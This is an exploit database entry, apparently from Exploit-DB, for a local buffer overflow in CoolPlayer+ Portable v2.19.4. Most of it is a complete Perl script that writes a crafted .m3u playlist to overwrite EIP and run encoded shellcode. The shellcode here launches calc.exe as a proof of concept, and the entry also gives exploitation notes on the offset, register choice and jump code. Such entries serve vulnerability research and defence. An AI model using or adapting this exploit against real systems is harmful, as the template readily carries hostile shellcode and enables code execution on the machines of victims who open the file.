CoolPlayer+ Portable v2.19.4 - Local Buffer Overflow

vendor:

CoolPlayer+ Portable

by:

Mike Czumak

7.5

CVSS

HIGH

Local Buffer Overflow

119

CWE

Product Name: CoolPlayer+ Portable

Affected Version From: 2.19.4

Affected Version To: 2.19.4

Patch Exists: NO

Related CWE:

CPE: a:coolplayer_project:coolplayer_portable:2.19.4

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2013

CoolPlayer+ Portable v2.19.4 – Local Buffer Overflow

Creates an .m3u file for a simple EIP overwrite. Buffer is mangled at esp (shellcode size < ~400) so ebx is a better choice. First overwrite eip with call ebx which points to the beginning of the buffer. Add 300 to ebx to jump past the eip overwrite and into shellcode (available space > 9400).

Mitigation:

Apply patches or updates provided by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/perl

############################################################################################################
# Exploit Title: CoolPlayer+ Portable v2.19.4 - Local Buffer Overflow
# Date: 11-15-2013
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: CoolPlayer+ Portable v2.19.4
# Software Link: http://portableapps.com/apps/music_video/coolplayerp_portable
# Version: 2.19.4
# Tested On: Windows XP SP3
#
# Credits: Seems various versions of this software have been vulnerable to BOF for a while
# -- http://www.exploit-db.com/exploits/4839/
#
# Details: Creates an .m3u file for a simple EIP overwrite
# -- Buffer is mangled at esp (shellcode size < ~400) so ebx is better choice
# -- First overwrite eip with call ebx which points to beginning of buffer
# -- Add 300 to ebx to jump past the eip overwrite and into shellcode (available space > 9400)
############################################################################################################

my $buffsize = 10000; # set consistent buffer size

my $jmp = "\x83\xc3\x64" x 3; # add 300 to ebx which will jump beyond eip overwrite and into nops/shellcode
$jmp = $jmp . "\xff\xe3"; # jmp ebx

my $junk = "\x41" x (260 - length($jmp)); # fill remainder of start of buffer to eip overwrite at offset 260

my $eip = pack('V',0x7c810395); # call ebx [kernel32.dll] which points to start of buffer and our jump code
				# no usable application module found

my $nops = "\x90" x 50;

# Calc.exe payload [size 227]
# msfpayload windows/exec CMD=calc.exe R | 
# msfencode -e x86/shikata_ga_nai -c 1 -b '\x00\x0a\x0d\xff'
my $shell = $shell . "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9" .
"\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92" .
"\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84" .
"\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e" .
"\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1" .
"\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27" .
"\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb" .
"\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b" .
"\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2" .
"\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37" .
"\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3" .
"\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef" .
"\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb" .
"\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf" .
"\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83" .
"\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3" .
"\x9a\xca\xc0";

my $sploit = $jmp.$junk.$eip.$nops.$shell; # build sploit portion of buffer
my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer for size consistency
my $buffer = $sploit.$fill; # build final buffer

# write the exploit buffer to file
my $file = "coolplayer.m3u";
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file [" . $file . "] created\n";
print "Buffer size: " . length($buffer) . "\n";